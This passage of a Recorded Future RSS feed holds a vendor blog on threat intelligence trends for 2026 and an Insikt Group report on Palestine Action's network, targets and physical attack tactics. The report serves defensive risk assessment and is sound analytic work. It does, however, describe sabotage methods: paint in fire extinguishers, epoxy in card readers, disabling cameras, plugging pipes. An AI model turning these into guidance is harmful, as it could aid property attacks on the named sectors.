          <li><strong>Conflict escalation:</strong> With more weapons and logistical support from great power backers, fighting between Country A and Country B expands from the border to strikes further in the interior. Both military and civilian casualties increase as violence escalates.</li>
          <li><strong>Regional economic impact:</strong> Extended disruptions may cause international corporations to move operations to more stable regions, leading to a negative economic impact in the region.</li>
        </ul>
        <h2>Further Reading</h2>
        <ul>
          <li><a href="https://www.recordedfuture.com/research/influence-operations-and-conflict-escalation-in-south-asia">Influence Operations and Conflict Escalation in South Asia</a></li>
          <li><a href="https://www.recordedfuture.com/research/apt32-malware-campaign">New APT32 Malware Campaign Targets Cambodian Government</a></li>
          <li><a href="https://substack.com/inbox/post/180401534?r=3g10gt&amp;utm_medium=ios&amp;triedRedirect=true">From Pegasus to Pall Mall: Managing Risks of Offensive Cyber Capabilities</a></li>
          <li><a href="https://assets.recordedfuture.com/insikt-report-pdfs/2023/cta-2023-0112.pdf">Current Trends in the Turkish Language Dark Web</a></li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_1a43602f57ec7a07f0637d7b7010998c1f0bcbc8d.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[What’s Next for Enterprise Threat Intelligence in 2026]]></title>
            <link>https://www.recordedfuture.com/blog/whats-next-for-enterprise-threat-intelligence-in-2026</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/whats-next-for-enterprise-threat-intelligence-in-2026</guid>
            <pubDate>Mon, 15 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Top enterprise threat intelligence trends for 2026: AI-augmented CTI, unified platforms, workflow integration, data fusion, budgets, ROI, and maturity.]]></description>
            <content:encoded><![CDATA[
        <h2>Introduction</h2>
        <p>The cybersecurity landscape is rapidly growing in scale and complexity. Enterprises face a rising tide of sophisticated threats that cannot be contained by traditional, reactive defenses alone. With AI and automation lowering the barrier to entry for attackers exploiting new avenues, there is more opportunity than ever for disruptive, high-volume attacks.</p>
        <p>The need for organizations to mature their threat intelligence capabilities is clear, but the road to get there isn’t always easy. Recorded Future’s <a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html">2025 State of Threat Intelligence Report</a> found that only 49% of enterprises currently consider their threat intelligence maturity as advanced, yet 87% expect to make significant progress in the next two years.</p>
        <p>This gap between today’s capabilities and tomorrow’s ambitions reflects a familiar challenge: organizations have plenty of threat data, but struggle to connect, automate, and operationalize it effectively across teams and tools.</p>
        <p>Based on insights from the report, here is what enterprises can expect when it comes to threat intelligence in 2026.</p>
        <h2>Key Trends Driving Threat Intelligence Evolution</h2>
        <p>There are several key trends set to shape threat intelligence in the coming year, and organizations wanting to prioritize maturity should be on the lookout for partners that embrace and evolve with these currents in mind.</p>
        <ul>
          <li><strong>Vendor Consolidation for Unified Intelligence:</strong> Enterprises are looking to reduce tool fragmentation by consolidating threat intelligence vendors and feeds into a single platform. A unified approach promises a “single source of truth,” making it easier to operationalize intelligence across the organization.</li>
          <li><strong>Deeper Integration into Security Workflows:</strong> Organizations want threat intelligence deeply embedded in their existing security stack rather than as a siloed feed. In fact, 25% of enterprises plan to integrate threat intelligence with additional workflows (e.g. IAM, fraud, GRC) in the next two years to broaden their reach.</li>
          <li><strong>Automation and AI Augmentation:</strong> To cope with accelerating threats and volumes of data, teams are embracing automation in threat intelligence. The future lies in machine-speed analysis that automatically correlates and enriches intelligence so analysts can focus on high-level judgment.</li>
          <li><strong>Fusion of Internal and External Data:</strong> Over a third of organizations (36%) plan to combine external threat intelligence with data from their own environment to gain better insight into risk posture (and even benchmark against peers).</li>
        </ul>
        <h2>Challenges Holding Teams Back Today</h2>
        <p>Despite this forward momentum, many enterprise teams still struggle with persistent challenges that hinder their threat intelligence efforts.</p>
        <ul>
          <li><strong>Integration Gaps:</strong> Fragmented ecosystems remain a top concern. Nearly half of organizations (48%) cite poor integration with existing security tools among their biggest pain points.</li>
          <li><strong>Credibility and Trust Issues:</strong> Data means little if analysts don’t trust the intelligence. Half of enterprises say verifying the credibility and accuracy of threat intelligence is a major challenge.</li>
          <li><strong>Signal-to-Noise Overload:</strong> With huge volumes of alerts and feeds, 46% of enterprises struggle to filter relevant insight from noise. This information overload hampers visibility into real threats, drains team efficiency, and contributes to analyst burnout.</li>
          <li><strong>Lack of Context for Action:</strong> Even when threat data is available, 46% of organizations lack the context needed to translate it into meaningful risk insights or actionable priorities.</li>
        </ul>
        <p>These barriers help explain why many programs plateau at an intermediate maturity. Teams may ingest more data sources over time, but still fall short on the automation, integration, and context needed for truly advanced, predictive intelligence.</p>
        <h2>Envisioning Threat Intelligence in 2026: Proactive, Integrated, and Business-Aligned</h2>
        <p>In the near future, leading enterprises will treat threat intelligence not as a side task but as a strategic function integrated into business processes. This means embedding threat insights directly into risk assessments, vulnerability management, and even board-level decisions on security (notably, 58% of organizations already use threat intelligence to guide business risk assessment decisions today).</p>
        <p>Instead of simply reacting to incidents after they occur, advanced threat intelligence programs will analyze patterns and emerging trends to warn of potential attacks before they fully materialize. This doesn’t mean magically “knowing the future,” but sharpening awareness by connecting subtle signals across many sources and mapping them to one’s environment.</p>
        <p>Human analysts will still be central for this kind of work, though their capabilities will be augmented by AI such that detection and response happen at machine speed. Intelligence platforms will automatically enrich new indicators, correlate them with ongoing events, and even trigger protective actions in real time—all with analysts overseeing the entire process.</p>
        <p>Ultimately, a mature program in 2026 will be measured by the outcomes it enables and the risk it reduces for the organization. This means protecting the assets, uptime, and reputation the business cares about, and improving decision quality at all levels of management.</p>
        <h2>Implications for 2026 Security Budgets and Investments</h2>
        <p>As threat intelligence becomes more central to security strategy, it’s also becoming a bigger line item in budgets. In fact, 91% of organizations plan to increase their threat intelligence spending in 2026, reflecting its critical role in an era of escalating cyber threats.</p>
        <p>One likely area for these increased funds is platform consolidation. Many teams are reevaluating their myriad point solutions and considering a move to more integrated platforms that unify multiple sources and use cases, reducing complexity and cost over time.</p>
        <p>Another likely investment will be in automation and AI capabilities. With cyber talent scarce and alert volumes ever-increasing, it will be vital to budget for tools that automate threat intelligence workflows end-to-end. From data collection and enrichment to triage and even initial response, automation will be key to doing more with the same team.</p>
        <div>
          <div>
            <div>After integrating Recorded Future into our Cyber Threat Intelligence (CTI) workflow…. We reduced detection time by 40%, from an average of 48 hours to 28 hours. Incident response efficiency improved by 30%, as automated enrichment from Recorded Future replaced manual intelligence gathering. We also identified and mitigated 25% more threats compared to the previous quarter.</div>
          </div>
          <div>
            <div><strong>Cyber Threat Intelligence Specialist, Large Enterprise Professional Services Company</strong></div>
          </div>
        </div>
        <p>Organizations should also ensure that new investments deliver contextual intelligence tailored to their business. It’s not enough to simply buy more feeds or tools that spit out data; the value lies in solutions that fuse internal data with external threat feeds and apply analytics to highlight what matters most.</p>
        <p>That said, not every organization will have the same needs and challenges. The key to fully maximizing ROI will be aligning spending with the organization’s biggest gaps and pain points. If credibility of data is a major challenge, invest in sources with proven reliability or validation features. If integration is a key issue, focus spending on consolidation projects or appropriate vendor services.</p>
        <p>Security teams should also establish clear metrics (such as reduced incident response time or incidents prevented) to measure the impact of threat intelligence investments. For example, over half (54%) of organizations now measure success by improved detection and response times, making it a top metric for demonstrating value delivered by threat intelligence initiatives.</p>
        <h2>Charting the Course to 2026</h2>
        <p>Enterprise threat intelligence is undoubtedly maturing and becoming more ingrained in security programs, yet much work still remains. Nearly half of organizations may call themselves “advanced” today, but truly predictive, integrated intelligence at scale is still a goalpost ahead. In looking toward 2026, security leaders should double down on the fundamentals that drive intelligence maturity: integration, automation, and alignment with business priorities.</p>
        <p>By breaking down silos between tools and teams, trusting and acting on intelligence through improved data credibility and context, and continually measuring what works, teams can evolve from reactive defense to an anticipatory, intelligence-driven security posture.</p>
        <p>So what are some practical next steps? First, it’s wise to benchmark your organization’s current program to identify gaps and opportunities. Tools like <a href="https://www.recordedfuture.com/resources/maturity-assessment">Recorded Future’s Threat Intelligence Maturity Assessment</a> provide a structured way to evaluate where you stand today and get tailored recommendations on how to improve.</p>
        <p>With that insight, you can develop a roadmap that includes the right people, process, and technology investments to operationalize threat intelligence in the most efficient way. Keep the big picture in mind: the ultimate aim is to see more threats, identify them faster, and take action to reduce risk before damage is done. With a thoughtful strategy and an eye towards these trends, organizations can chart a course from today’s challenges to a more proactive and resilient threat intelligence function in 2026 and beyond.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_18741ecd2e5bc1f72686d64726aaa4419be1e620f.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Palestine Action: Operations and Global Network]]></title>
            <link>https://www.recordedfuture.com/research/palestine-action-operations-and-global-network</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/palestine-action-operations-and-global-network</guid>
            <pubDate>Thu, 11 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Explores Palestine Action’s post-designation global network, tactics, and targets, and evaluates key physical risks and mitigations for organizations.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Palestine Action has almost certainly responded to its July 2025 designation as a terrorist organization in the United Kingdom (UK) by encouraging domestic violent extremists (DVEs) outside the UK with a nexus to the group to increase the scope and frequency of their operations, while abstaining from conducting or claiming attacks within the UK. Palestine Action’s dual-track strategy, very likely intended to maintain pressure on the multinational companies they target while avoiding complications to their legal efforts to contest the UK designation in court, almost certainly poses persistent physical threats to private and public sector facilities in Western Europe, North America, and Australia. Recent arrests of pro-Palestine Action protesters in the UK and events in the Israel-Hamas conflict have very likely prompted Palestine Action’s global network to more frequently conduct militant direct actions on behalf of Palestine Action’s interests.</p>
        <p>Palestine Action’s global network consists of pro-Palestinian activist groups that share the UK branch’s commitment to militant direct action and other core aspects of the group’s operational profile — such as motivating ideologies, preferred targets, area(s) of operation, or tactics, techniques, and procedures (TTPs). The most popular TTPs within the network are almost certainly those that Palestine Action’s UK branch has promoted or employed, including vandalizing the exterior of facilities with red paint or blunt instruments, obstructing facilities with “human chains” or large objects, and sabotaging valuable assets inside the perimeter of a facility. Defense contractors that provide services to Israel’s government or military are almost certainly the primary target of the Palestine Action global network, although the network has also frequently targeted insurance agencies, banks and financial entities, and shipping companies.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>Palestine Action’s July 2025 terrorism designation in the UK very likely broadened the geographic scope of its operations and potential targets, as activist groups in its global network outside the UK almost certainly have greater freedom of maneuver.</li>
          <li>Since October 7, 2023, events in the Israel-Hamas conflict, especially expansions of Israeli military activity or reports of humanitarian crises in the Gaza Strip, have prefigured physical attacks with a nexus to Palestine Action.</li>
          <li>The facilities of Western European, North American, and Australian defense contractors, banks, insurance companies, international shipping and logistics service providers, and government agencies — particularly those with a perceived relationship to Israel — very likely face elevated physical risks from Palestine Action’s global network.</li>
          <li>The most costly Palestine Action operations — some of which have caused several million dollars in damages to targeted organizations — very likely resulted from Palestine Action operatives breaching facilities’ secure perimeters.</li>
          <li>In the short to medium term, Palestine Action militant direct action in the UK is very likely to maintain a lower operational tempo until the group either succeeds in its effort to rescind its terrorism designation or exhausts all legal avenues to do so.</li>
        </ul>
        <h2>Palestine Action: History and Terrorism Designation</h2>
        <p>Palestine Action was <a href="https://web.archive.org/web/20210530081122/https://palestineaction.org/the-launch-of-palestine-action/">founded</a> in the UK in July 2020 by Huda Ammori and Richard Loxton-Barnard, longtime UK-based activists in the pro-Palestinian and environmental movements, respectively. Palestine Action’s core purpose is almost certainly to <a href="https://newleftreview.org/sidecar/posts/tactics-of-disruption">promote</a> militant direct action by pro-Palestinian activists around the world, particularly those who aim to disrupt the operations of government agencies, defense contractors, and private companies that supply Israel or the Israel Defense Forces (IDF). Historically, the group’s UK core has <a href="https://newleftreview.org/sidecar/posts/tactics-of-disruption">focused</a> its efforts on targeting the Israeli multinational defense contractor Elbit Systems (Elbit), as well as its partners and subsidiaries. Like other domestic violent extremist (DVE) groups, Palestine Action and its individual global network groups very likely lack formal hierarchies, opting instead to function as decentralized activist cells.</p>
        <p>Palestine Action very likely distinguishes between elements of the organization that focus on non-violent direct actions — such as protests, demonstrations, and political activity — and the organization’s covert cells dedicated to militant direct action. On August 2, 2023, the group announced the creation of “Palestine Action Underground,” its label for the group’s “covert missions,” and stated that its future militant direct actions would target “any business found to be collaborating with Elbit via their research, technology, consultation, labour, components, or any other service.” A March 2025 unclassified intelligence assessment from the UK’s Joint Terrorism Analysis Centre (JTAC) <a href="https://static01.nyt.com/newsgraphics/documenttools/c8fe6a933eb1bb7b/70535e60-full.pdf">reported</a> that between July 2020 and March 2025, Palestine Action “conducted over 385 direct actions” in the UK, including both non-violent and militant direct actions. These actions have occurred throughout the UK, supporting JTAC’s assessment that the group has cells throughout the country, but police in the UK have reported higher degrees of Palestine Action-related activity in Greater London, as well as “Staffordshire, Greater Manchester, Leicestershire, Metropolitan, Kent, and Avon and Somerset.”</p>
        <p>The frequency and scope of Palestine Action’s operations in the UK almost certainly <a href="https://newleftreview.org/sidecar/posts/tactics-of-disruption">increased</a> following the October 7, 2023, Hamas attack in Israel and the subsequent Israel-Hamas war in the Gaza Strip. <strong>Figure 1</strong> (below) shows references in the Recorded Future Intelligence Operations Platform to incidents of sabotage or vandalism in the UK involving Palestine Action between its 2020 founding and 2025 terrorism designation, annotated with significant events during the post-October 2023 Israel-Hamas conflict. In many instances, Palestine Action’s operations followed major developments in this conflict, such as expansions of Israeli military activity in the Gaza Strip or elsewhere in the Middle East, reports of humanitarian crises in Gaza, or the deaths of senior Hamas, Palestinian Islamic Jihad (PIJ), or Hezbollah figures in targeted airstrikes.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_149bfd2b732d8d0ef9b2dd07170bc16c93226b7c6.png?width=750&amp;format=png&amp;optimize=medium" width="1428" height="738" />
        </p>
        <p><em><strong>Figure 1</strong>: References to Palestine Action operations in the UK in the Recorded Future Intelligence Operations Platform alongside key developments in the Israel-Hamas conflict (Source: Recorded Future)</em></p>
        <p>The culmination of Palestine Action’s direct action campaign in the UK was a June 20, 2025, <a href="https://www.bbc.com/news/articles/cx24nppdx0lo">operation</a> in which several of the group’s members illegally breached the Royal Air Force (RAF) Brize Norton base in Oxfordshire, sprayed paint into the engines of two RAF Airbus A330 Multi Role Tanker Transport (MRTT) aerial refueling aircraft, and damaged the jets with crowbars. In total, the attack <a href="https://apnews.com/article/raf-brize-norton-palestine-action-planes-8467a20bcd088e24c3fe061852b33ba2">caused</a> over seven million pounds ($9.5 million) in damages and prompted calls for UK law enforcement agencies to crack down on Palestine Action. Three days after the attack, UK Home Secretary Yvette Cooper <a href="https://hansard.parliament.uk/commons/2025-06-23/debates/25062337000014/PalestineActionProscription">announced</a> the Home Office’s intent to proscribe Palestine Action under the UK’s Terrorism Act 2000. The UK Parliament approved the proscription with votes on July 2 and 3, 2025, and Palestine Action was officially <a href="https://www.legislation.gov.uk/uksi/2025/803/pdfs/uksiem_20250803_en_001.pdf">designated</a> a terrorist organization in the UK on July 5; this status prohibits individuals from joining, fundraising for, or expressing support for Palestine Action, with penalties of up to fourteen years in prison for a conviction for membership in the group.</p>
        <p>Palestine Action has almost certainly pursued a dual-track strategy in response to its designation in the UK, abstaining from major sabotage operations in the UK while inciting its global network to conduct these operations outside of the country. Insikt Group is not aware of significant incidents of sabotage connected to Palestine Action in the UK since its proscription. Instead, the group has attempted to legally <a href="https://www.bbc.com/news/articles/ce9dg5v43vmo">challenge</a> the ban and garner public support for its cause through a <a href="https://www.bbc.com/news/articles/ceq2e9x19g8o">series</a> of unlawful (due to Palestine Action’s proscription) but well-attended protests in which several thousand demonstrators have been arrested for expressing support for Palestine Action.</p>
        <p>However, the organization’s international network outside the UK has almost certainly taken responsibility for Palestine Action’s direct action campaigns, targeting defense contractors, militaries, and other industries perceived to be supporting Israel with sabotage, vandalism, and other disruptive physical threat activities despite the UK terrorism designation. In August 2025, Palestine Action’s official website deleted all of its content and posted a statement (<strong>Figure 2</strong>) claiming that “the website has been transferred to others in the global movement who are not active in Britain or British nationals.” The website now provides two ways for individuals to contribute to the organization: through its Monero (XMR) cryptocurrency wallet or through the website of its Italian franchise, Palestine Action Italia (also known as Palestina Libera). On September 8, 2025, a Palestine Action Global social media account began posting and announced the launch of the “Palestine Action Global” platform, indicating the organization’s belief that “Palestine Action is a global network taking direct action against the Israeli war machine.”</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_12151bbf3b847608b6c89f0a881a17286c50082ea.png?width=750&amp;format=png&amp;optimize=medium" width="1409" height="663" /><br /><em><strong>Figure 2:</strong></em> <em>Statement on Palestine Action website with cryptocurrency wallet information and link to Italian franchise (Source: Palestine Action)</em>
        </p>
        <p>Groups in Palestine Action’s network in North America, Europe, and Australia — as detailed below — are very likely to increase their operational tempo in response to the UK proscription of Palestine Action and ongoing developments in the Israel-Hamas conflict. In the short term, the frequency of direct action conducted by groups in Palestine Action’s global network is likely to outpace the parent organization in the UK, as it is likely to continue its <em>de facto</em> moratorium on sabotage and vandalism while it attempts to legally appeal its proscription. Nevertheless, Palestine Action will very likely attempt to continue providing support to its international network through organizing trainings for activists, sharing instructional material, and using its platform to advertise the activities of the network around the world.</p>
        <h2>Palestine Action’s Tactics, Techniques, Procedures, and Targets</h2>
        <p>Palestine Action’s UK branch and its global network almost certainly rely on standard operating procedures for conducting attacks against facilities to disrupt the business operations of their intended targets. Specifically, DVEs associated with the group almost certainly prefer TTPs for attacks that are described in Palestine Action’s 2023 instructional guide to carrying out militant direct actions in support of the group’s objectives. Namely, Palestine Action and its global network have frequently and repeatedly used the same vandalism, physical obstruction, and sabotage TTPs in operations, as described in the following section. DVEs with a nexus to Palestine Action very likely select which TTP to employ in operations based on their level of access to the targeted facility in question, conducting more destructive and sophisticated attacks when they are able to gain interior access.</p>
        <p>Across the globe, the primary targets of Palestine Action and similar groups are almost certainly the offices of defense contractors that have perceived relationships with the IDF or the Israeli government. In the UK and Western Europe, Elbit and its subsidiaries and partners have been most frequently targeted in Palestine Action attacks. However, due to the global footprint of Palestine Action’s network and the expansion of the Israel-Hamas conflict since October 2023, Palestine Action and similar groups have also attacked entities in other sectors that are perceived to be doing business with the IDF, the Israeli government, or Elbit. Aside from defense contractors and governments, the most frequently targeted industry sectors are insurance, banks and financing, logistics, and shipping.</p>
        <h3>Direct Action TTPs</h3>
        <p>Palestine Action almost certainly uses physical attack TTPs that are intended to maximize the degree of economic disruption and damage to targeted facilities, but minimize the risks of harm to individuals and detection by law enforcement. By imposing financial cost on targeted companies during operations, Palestine Action almost certainly seeks to convince the targeted entity to sever its relationships with the IDF or Israeli government. Insikt Group associates the following overarching TTPs with attacks perpetrated by Palestine Action or its global network:</p>
        <ul>
          <li>Palestine Action operations are typically carried out by small cells, mostly consisting of fewer than five activists.</li>
          <li>Palestine Action conducts targeted operations against facilities outside of business hours to maintain operational security and minimize the risks of harm to personnel or the identification/detection of its operatives.</li>
          <li>Palestine Action operations aim to impose substantial financial costs to targeted entities through rudimentary, low-sophistication methods.</li>
          <li>Palestine Action operatives prefer vandalism, obstruction, and sabotage as TTPs; which TTP is selected is very likely contingent on the degree of access to the facility.
            <ul>
              <li>If operatives cannot gain entry to the facility, they will very likely prefer to vandalize the exterior of the facility or attempt to block external entry.</li>
              <li>If operatives are able to gain internal access to the facility — usually by identifying and exploiting potential access points during pre-attack reconnaissance or by using physical force to enter — they will very likely attempt to sabotage infrastructure inside the facility.</li>
            </ul>
          </li>
        </ul>
        <h4>Vandalism</h4>
        <p>Almost all observed Palestine Action operations involve vandalism of the exterior of targeted facilities, with two types of actions especially prominent. First, DVEs affiliated with Palestine Action have frequently used red spray paint to either indiscriminately color or write messages on the facades of targeted facilities, or, by dispersing paint through a fire extinguisher, blanketing the exterior or interior of a facility with red paint. Second, these DVEs use tools or projectiles, including hammers, crowbars, blunt objects, and bricks, to destroy windows on the exterior of targeted buildings.</p>
        <p>These vandalism methods are each attested to in Palestine Action’s official instructional guide as effective ways to “destrupt [sic], damage or destroy your target.” The manual also recommends that DVEs use the same vandalism TTPs to damage exterior surveillance systems in order to avoid detection during direct actions, or to destroy infrastructure such as air conditioning systems or pipes outside the facility to “sabotage the profits of your target even further.”</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_10e806cffcc88b90ce3d873718b05e1904a5c2fb0.png?width=750&amp;format=png&amp;optimize=medium" width="934" height="502" />
        </p>
        <p><em><strong>Figure 3</strong>: Evidence of vandalism TTPs from a February 2025 Palestine Action attack against an Allianz insurance office in Milton Keynes, UK (Source: Palestine Action)</em></p>
        <h4>Obstruction</h4>
        <p>Palestine Action operations have also used physical obstruction as a TTP to prevent access to targeted facilities. Unlike other attack TTPs associated with Palestine Action, the group has often used methods of obstructing facilities that are very unlikely to be intended to maintain the covert nature of the operation. Specifically, in some operations, Palestine Action cells have physically obstructed access to targeted facilities by forming a human blockade: sitting down, interlocking arms, blocking access to a main doorway, and on occasion chaining themselves together or to an immovable object (such as a vehicle or post). In a break from the patterns of other observed Palestine Action TTPs, activists have attempted blockades during normal business hours, mainly to prevent facility employees from entering the premises.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1c0b3ea7939281ba6720a594996ce304846f148cf.png?width=750&amp;format=png&amp;optimize=medium" width="800" height="450" />
        </p>
        <p><em><strong>Figure 4:</strong></em> <em>Palestine Action activists blockade a Lockheed Martin facility in Bedfordshire, UK, in a November 2023 protest (Source:</em> <em><a href="https://www.bbc.com/news/uk-england-beds-bucks-herts-67519517">BBC</a>)</em></p>
        <p>Palestine Action network groups — particularly in the United States (US) — have also experimented with more novel methods of facility obstruction that can be covertly conducted. Cells with a nexus to the US-based Palestine Action offshoot Unity of Fields (UoF), for instance, launched a campaign in the summer and fall of 2024 to target Citibank automated teller machine (ATM) locations in the New York and Los Angeles metropolitan areas due to the bank’s perceived support of Israeli interests. In addition to vandalizing the facilities, the cells inserted epoxy and affixed cement-glue stickers to exterior card-reader devices that were necessary to enter the facilities. Palestine Action’s instructional guide also calls for activists to use concrete to plug water or sewage pipes leading to targeted facilities, although Insikt Group has not observed Palestine Action operatives using this TTP.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_13c10409dc1a57c4f5f1e968bab131a61780ca022.png?width=750&amp;format=png&amp;optimize=medium" width="675" height="900" />
        </p>
        <p><em><strong>Figure 5:</strong></em> <em>Activists insert epoxy into a Citibank card reader in New York City on October 7, 2024 (Source: Unity of Fields)</em></p>
        <h4>Sabotage</h4>
        <p>Sabotage operations remain the most likely of the TTPs historically employed by Palestine Action to impose serious financial costs on the victims of its operations. While almost certainly relying on low-tech and low-sophistication methods, Palestine Action has caused millions of dollars in damages through sabotage operations, mainly to technology and other assets inside targeted facilities. In previous incidents, cells linked to Palestine Action have relied on the same toolkit used for vandalism and obstruction — large, blunt objects like crowbars and wrenches, and fire extinguishers filled with paint — to sabotage their target. Activists almost certainly prefer these tools due to their low cost, ease of use, minimal profile, and the difficulty of tracing their purchase; their use across the spectrum of Palestine Action’s TTPs likely indicates that activists are opportunistic, employing the toolkit for sabotage rather than vandalism or obstruction when they can exploit vulnerabilities in facility security.</p>
        <p>The most notable and recent sabotage incident connected to Palestine Action was the aforementioned breach of RAF Brize Norton, the largest RAF base in the UK, on June 20, 2025. A video of this attack posted by the group <a href="https://www.bbc.com/news/videos/czxwvp7lykko">shows</a> activists approaching Airbus A330s on the base using electric scooters. They damaged the aircraft by spraying red paint through a fire extinguisher directly into the planes’ engines and striking the aircraft with crowbars. The attack caused approximately £7 million ($9.4 million) in damages to the aircraft, almost certainly <a href="https://covertaccessteam.substack.com/p/the-raf-brize-norton-breach-what">due</a> to the impact of the attack on sensitive parts and equipment inside the planes’ engines. The attack on RAF Brize Norton <a href="https://www.reuters.com/business/aerospace-defense/four-pro-palestinian-activists-charged-over-uk-military-base-break-in-2025-07-03/">led</a> to the arrest and indictment of five Palestine Action-linked activists and almost certainly prompted the UK terrorism designation of the group, as well as improvements to facility and perimeter security at the RAF base.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1c315d371b4cb1477f8fe5f99e66778bb49f47d21.png?width=750&amp;format=png&amp;optimize=medium" width="465" height="262" />
        </p>
        <p><em><strong>Figure 6:</strong></em> <em>Palestine Action activists approach aircraft at RAF Brize Norton on electric scooters (Source: Palestine Action)</em></p>
        <p>Palestine Action activists also deployed sabotage TTPs in several additional operations targeting defense contractors in the UK. In August 2024, a Palestine Action cell in Bristol <a href="https://www.reuters.com/world/uk/nine-deny-attack-israeli-firm-elbits-uk-warehouse-2025-01-17/">breached</a> an Elbit warehouse by driving a van through perimeter fencing, entered the facility, and began sabotaging internal equipment with sledgehammers, axes, and other blunt instruments. In total, the operation <a href="https://www.reuters.com/world/uk/nine-deny-attack-israeli-firm-elbits-uk-warehouse-2025-01-17/">caused</a> over £1 million ($1.3 million) in damages; protesters also allegedly assaulted a security guard and law enforcement officers responding to the incident, prompting JTAC to <a href="https://static01.nyt.com/newsgraphics/documenttools/c8fe6a933eb1bb7b/70535e60-full.pdf">label</a> the attack as an “act of terrorism.” During a June 1, 2022, incident at a Thales Group facility in Glasgow, Palestine Action activists <a href="https://www.bbc.com/news/articles/c9wj144zd7po">accessed</a> the roof and entered the facility, destroying parts used for submarines with blunt instruments. In conjunction with the sabotage operation, two protesters glued themselves to the roof, likely attempting to obstruct access to the facility.</p>
        <h3>Targets</h3>
        <p>Palestine Action’s <a href="https://newleftreview.org/sidecar/posts/tactics-of-disruption">primary target</a> in the UK has almost certainly been Elbit: the global defense contractor has been the most frequent victim of its attacks, the group’s propaganda and instructional material list Elbit as the group’s preferred target, and Palestine Action has launched branded campaigns designed specifically to encourage activists to attack Elbit facilities. As secondary targets, the group has <a href="https://static01.nyt.com/newsgraphics/documenttools/c8fe6a933eb1bb7b/70535e60-full.pdf">conducted</a> notable attacks against other public and private sector defense entities perceived to have some association with the Israeli military, namely the UK’s Ministry of Defence (MoD), Teledyne Technologies, Thales Group, Leonardo, and Rafael Advanced Defense Systems. According to its 2023 announcement and its post-October 7, 2023, activity, the group and its international network consider a range of entities in sectors that reportedly supply goods or services to Elbit or the Israeli military — including banks, financial institutions, insurance agencies, real estate brokers, accounting firms, human resources contractors, and international shipping and logistics companies — as legitimate targets for militant direct action. Direct actions have also <a href="https://static01.nyt.com/newsgraphics/documenttools/c8fe6a933eb1bb7b/70535e60-full.pdf">targeted</a> other UK government entities, including the UK Foreign and Commonwealth Office, the BBC, and the London Stock Exchange. Palestine Action almost certainly targets these companies with the goal of inflicting maximum financial and reputational damage through its operations, in order to convince companies to cease their business with Elbit or Israeli entities.</p>
        <p>As the next section demonstrates, the international expansion of Palestine Action network groups adopting the UK branch’s modus operandi or TTPs has almost certainly broadened the range of secondary and tertiary targets that are likely to be affected by militant direct action campaigns. However, Palestine Action and its global network very likely share a focus on specific sectors — defense contracting, banking, insurance, and international shipping and logistics — that relevant groups and cells are likely to target regardless of their respective area of operations. Moreover, the TTPs Insikt Group associates with Palestine Action’s UK branch have almost certainly been adopted by its international counterparts, very likely due to the influence of Palestine Action’s militant direct action campaigns in the UK, instructional material, and training sessions for activists.</p>
        <h2>Palestine Action’s Global Network</h2>
        <p>Palestine Action’s global network consists of groups of activists around the world who share Palestine Action UK’s commitment to disrupting the normal business operations of entities partnered with the State of Israel through militant direct action. Some of these groups refer or have referred to themselves explicitly as “Palestine Action”; have direct relationships to the UK branch through their members, partners, or benefactors; choose identical targets, such as Elbit; or, like Palestine Action UK, are solely motivated by the anti-Israel cause. Others, despite lacking these relationships, have directly appropriated Palestine Action UK’s TTPs, targets, or other aspects of the organization to support their own operations.</p>
        <p>We classify groups in Palestine Action’s global network based on which elements they share in common with the UK branch. As depicted in <strong>Table 1</strong>, our four-part classification labels each Palestine Action network group as a Palestine Action <strong>franchise</strong>, <strong>affiliate</strong>, <strong>offshoot</strong>, or <strong>partner</strong>, depending on whether it shares areas of operation, motivating ideology, TTPs, or targets with the UK branch. These categories are not static and are subject to change over time, particularly as groups founded as Palestine Action franchises outside the UK adapt to the local landscape in their own countries and form their own brand. Table 1 additionally contains examples of each of the four categories of Palestine Action network groups, with the following subsections containing case studies of particularly notable franchise, affiliate, offshoot, and partner groups.</p>
        <table>
          <thead>
            <tr>
              <th>Label</th>
              <th>Nexus (shared with UK branch)</th>
              <th>Distinction (differs from UK branch)</th>
              <th>Examples</th>
            </tr>
          </thead>
          <tbody>
            <tr>
              <td><strong>Franchise</strong></td>
              <td>Ideology, TTPs, targets</td>
              <td>Area of operation</td>
              <td>Palestina Libera (Italy), Palestine Action Germany, Palestine Action Sweden, Palestine Action Eire (Ireland), Palestine Action Belgium, Palestine Action NL, Palestine Action Norway, Palestine Action Canada, Palestine Action Group Canberra (Australia), Palestine Action Tunisia</td>
            </tr>
            <tr>
              <td><strong>Affiliate</strong></td>
              <td>Ideology, TTPs</td>
              <td>Area of operation, targets</td>
              <td>Death to Toll (Australia)</td>
            </tr>
            <tr>
              <td><strong>Offshoot</strong></td>
              <td>Ideology, targets</td>
              <td>Area of operation, TTPs</td>
              <td>Unity of Fields (US), Shut Elbit Down (Germany/Austria)</td>
            </tr>
            <tr>
              <td><strong>Partner</strong></td>
              <td>Area of operation, TTPs</td>
              <td>Ideology, targets</td>
              <td>Shut the System (UK)</td>
            </tr>
          </tbody>
        </table>
        <p><em><strong>Table 1:</strong></em> <em>Classification of Palestine Action global network groups (Source: Insikt Group)</em></p>
        <h3>Franchise: Palestine Action Italia/Palestina Libera (Italy)</h3>
        <p>
